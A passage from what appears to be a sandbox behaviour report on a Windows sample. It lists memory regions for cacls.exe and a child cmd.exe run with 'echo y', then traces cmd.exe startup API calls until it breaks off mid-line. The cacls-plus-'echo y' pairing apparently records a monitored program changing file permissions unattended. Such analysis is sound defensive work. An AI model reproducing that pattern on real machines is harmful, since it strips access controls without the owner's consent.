AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 727 start_va = 0x480000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 728 start_va = 0x4a0000 end_va = 0x4a1fff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 729 start_va = 0x4b0000 end_va = 0x4befff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 730 start_va = 0x4c0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 731 start_va = 0x500000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 732 start_va = 0x540000 end_va = 0x543fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 733 start_va = 0x550000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 734 start_va = 0x560000 end_va = 0x561fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 735 start_va = 0xb30000 end_va = 0xb39fff entry_point = 0xb30000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 736 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 737 start_va = 0x7ee90000 end_va = 0x7eeb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee90000" filename = "" Region: id = 738 start_va = 0x7eebb000 end_va = 0x7eebbfff entry_point = 0x0 region_type = private name = "private_0x000000007eebb000" filename = "" Region: id = 739 start_va = 0x7eebc000 end_va = 0x7eebefff entry_point = 0x0 region_type = private name = "private_0x000000007eebc000" filename = "" Region: id = 740 start_va = 0x7eebf000 end_va = 0x7eebffff entry_point = 0x0 region_type = private name = "private_0x000000007eebf000" filename = "" Region: id = 741 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 742 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 743 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 744 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 754 start_va = 0x610000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 755 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 756 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 757 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 758 start_va = 0x480000 end_va = 0x48ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 759 start_va = 0x490000 end_va = 0x493fff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 760 start_va = 0x4a0000 end_va = 0x4a3fff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 761 start_va = 0x570000 end_va = 0x5edfff entry_point = 0x570000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 762 start_va = 0x5f0000 end_va = 0x5f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 763 start_va = 0x600000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 764 start_va = 0x620000 end_va = 0x621fff entry_point = 0x620000 region_type = mapped_file name = "cacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cacls.exe.mui") Region: id = 765 start_va = 0x6b0000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 766 start_va = 0x920000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 767 start_va = 0xb40000 end_va = 0xe14fff entry_point = 0xb40000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 768 start_va = 0x747f0000 end_va = 0x74814fff entry_point = 0x747f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 769 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 770 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 771 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 772 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 773 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 774 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 775 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 776 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 777 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 778 start_va = 0x7ed90000 end_va = 0x7ee8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed90000" filename = "" Thread: id = 19 os_tid = 0xb94 Process: id = "18" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x114e5000" os_pid = "0xb98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 779 start_va = 0x70000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 780 start_va = 0x90000 end_va = 0x91fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 781 start_va = 0xa0000 end_va = 0xaefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 782 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 783 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 784 start_va = 0x1f0000 end_va = 0x1f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 785 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 786 start_va = 0x210000 end_va = 0x211fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 787 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 788 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 789 start_va = 0x7e590000 end_va = 0x7e5b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e590000" filename = "" Region: id = 790 start_va = 0x7e5b6000 end_va = 0x7e5b6fff entry_point = 0x0 region_type = private name = "private_0x000000007e5b6000" filename = "" Region: id = 791 start_va = 0x7e5bc000 end_va = 0x7e5befff entry_point = 0x0 region_type = private name = "private_0x000000007e5bc000" filename = "" Region: id = 792 start_va = 0x7e5bf000 end_va = 0x7e5bffff entry_point = 0x0 region_type = private name = "private_0x000000007e5bf000" filename = "" Region: id = 793 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 794 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 795 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 796 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 815 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 816 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 817 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 818 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 823 start_va = 0x70000 end_va = 0x7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 824 start_va = 0x220000 end_va = 0x29dfff entry_point = 0x220000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 825 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 826 start_va = 0x690000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 827 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 828 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 829 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 830 start_va = 0x7e490000 end_va = 0x7e58ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e490000" filename = "" Region: id = 831 start_va = 0x80000 end_va = 0x83fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Thread: id = 20 os_tid = 0xb9c [0036.195] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0036.195] __set_app_type (_Type=0x1) [0036.195] __p__fmode () returned 0x76ea1768 [0036.195] __p__commode () returned 0x76ea176c [0036.195] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0036.195] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0036.195] GetCurrentThreadId () returned 0xb9c [0036.195] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb9c) returned 0x30 [0036.195] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0036.195] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0036.195] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.214] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0036.214] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efca4 | out: phkResult=0x1efca4*=0x0) returned 0x2 [0036.214] VirtualQuery (in: lpAddress=0x1efcb3, lpBuffer=0x1efc4c, dwLength=0x1c | out: lpBuffer=0x1efc4c*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0036.214] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efc4c, dwLength=0x1c | out: lpBuffer=0x1efc4c*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0036.214] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efc4c, dwLength=0x1c | out: lpBuffer=0x1efc4c*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0036.214] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efc4c, dwLength=0x1c | out: lpBuffer=0x1efc4c*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0036.214] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efc4c, dwLength=0x1c | out: lpBuffer=0x1efc4c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0036.214] GetConsoleOutputCP () returned 0x1b5 [0036.214] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.214] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0036.214] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.215] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0036.215] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.215] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0036.215] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.215] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.215] GetEnvironmentStringsW () returned 0x434058* [0036.215] FreeEnvironmentStringsA (penv="=") returned 1 [0036.215] GetEnvironmentStringsW () returned 0x434058* [0036.215] FreeEnvironmentStringsA (penv="=") returned 1 [0036.215] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eebf4 | out: phkResult=0x1eebf4*=0x40) returned 0x0 [0036.215] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eebfc, lpData=0x1eec00, lpcbData=0x1eebf8*=0x1000 | out: lpType=0x1eebfc*=0x0, lpData=0x1eec00*=0x0, lpcbData=0x1eebf8*=0x1000) returned 0x2 [0036.215] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eebfc, lpData=0x1eec00, lpcbData=0x1eebf8*=0x1000 | out: lpType=0x1eebfc*=0x4, lpData=0x1eec00*=0x1, lpcbData=0x1eebf8*=0x4) returned 0x0 [0036.215] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eebfc, lpData=0x1eec00, lpcbData=0x1eebf8*=0x1000 | out: lpType=0x1eebfc*=0x0, lpData=0x1eec00*=0x1, lpcbData=0x1eebf8*=0x1000) returned 0x2 [0036.215] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eebfc, lpData=0x1eec00, lpcbData=0x1eebf8*=0x1000 | out: lpType=0x1eebfc*=0x4, lpData=0x1eec00*=0x0, lpcbData=0x1eebf8*=0x4) returned 0x0 [0036.215] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eebfc, lpData=0x1eec00, lpcbData=0x1eebf8*=0x1000 | out: lpType=0x1eebfc*=0x4, lpData=0x1eec00*=0x40, lpcbData=0x1eebf8*=0x4) returned 0x0 [0036.215] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eebfc, lpData=0x1eec00, lpcbData=0x1eebf8*=0x1000 | out: lpType=0x1eebfc*=0x4, lpData=0x1eec00*=0x40, lpcbData=0x1eebf8*=0x4) returned 0x0 [0036.215] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eebfc, lpData=0x1eec00, lpcbData=0x1eebf8*=0x1000 | out: lpType=0x1eebfc*=0x0, lpData=0x1eec00*=0x40, lpcbData=0x1eebf8*=0x1000) returned 0x2 [0036.215] RegCloseKey (hKey=0x40) returned 0x0 [0036.215] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eebf4 | out: phkResult=0x1eebf4*=0x40) returned 0x0 [0036.215] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eebfc, lpData=0x1eec00, lpcbData=0x1eebf8*=0x1000 | out: lpType=0x1eebfc*=0x0, lpData=0x1eec00*=0x40, lpcbData=0x1eebf8*=0x1000) returned 0x2 [0036.216] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eebfc, lpData=0x1eec00, lpcbData=0x1eebf8*=0x1000 | out: lpType=0x1eebfc*=0x4, lpData=0x1eec00*=0x1, lpcbData=0x1eebf8*=0x4) returned 0x0 [0036.216] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eebfc, lpData=0x1eec00, lpcbData=0x1eebf8*=0x1000 | out: lpType=0x1eebfc*=0x0, lpData=0x1eec00*=0x1, lpcbData=0x1eebf8*=0x1000) returned 0x2 [0036.216] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eebfc, lpData=0x1eec00, lpcbData=0x1eebf8*=0x1000 | out: lpType=0x1eebfc*=0x4, lpData=0x1eec00*=0x0, lpcbData=0x1eebf8*=0x4) returned 0x0 [0036.216] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eebfc, lpData=0x1eec00, lpcbData=0x1eebf8*=0x1000 | out: lpType=0x1eebfc*=0x4, lpData=0x1eec00*=0x9, lpcbData=0x1eebf8*=0x4) returned 0x0 [0036.216] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eebfc, lpData=0x1eec00, lpcbData=0x1eebf8*=0x1000 | out: lpType=0x1eebfc*=0x4, lpData=0x1eec00*=0x9, lpcbData=0x1eebf8*=0x4) returned 0x0 [0036.216] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eebfc, lpData=0x1eec00, lpcbData=0x1eebf8*=0x1000 | out: lpType=0x1eebfc*=0x0, lpData=0x1eec00*=0x9, lpcbData=0x1eebf8*=0x1000) returned 0x2 [0036.216] RegCloseKey (hKey=0x40) returned 0x0 [0036.216] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5004f [0036.216] srand (_Seed=0x5aa5004f) [0036.216] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0036.216] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0036.216] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.216] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x434060, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0036.216] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.216] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.216] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0036.216] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.216] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0036.216] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0036.216] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0036.216] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0036.216] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0036.216] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0036.216] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0036.216] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0036.216] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0036.216] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef9d4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.216] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef9d4, lpFilePart=0x1ef9d0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x1ef9d0*="Desktop") returned 0x1c [0036.216] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0036.217] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef750 | out: lpFindFileData=0x1ef750) returned 0x434270 [0036.217] FindClose (in: hFindFile=0x434270 | out: hFindFile=0x434270) returned 1 [0036.217] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x1ef750 | out: lpFindFileData=0x1ef750) returned 0x434270 [0036.217] FindClose (in: hFindFile=0x434270 | out: hFindFile=0x434270) returned 1 [0036.217] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0036.217] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x1ef750 | out: lpFindFileData=0x1ef750) returned 0x434270 [0036.217] FindClose (in: hFindFile=0x434270 | out: hFindFile=0x434270) returned 1 [0036.217] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0036.217] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0036.217] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0036.217] GetEnvironmentStringsW () returned 0x4360b0* [0036.217] FreeEnvironmentStringsA (penv="=") returned 1 [0036.217] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.218] GetConsoleOutputCP () returned 0x1b5 [0036.218] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.218] GetUserDefaultLCID () returned 0x409 [0036.218] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0036.218] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efb00, cchData=128 | out: lpLCData="0") returned 2 [0036.218] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efb00, cchData=128 | out: lpLCData="0") returned 2 [0036.218] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efb00, cchData=128 | out: lpLCData="1") returned 2 [0036.218] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0036.218] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0036.218] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0036.218] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0036.218] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0036.218] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0036.218] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0036.218] GetLocaleInfoW (in: Locale=0x409, 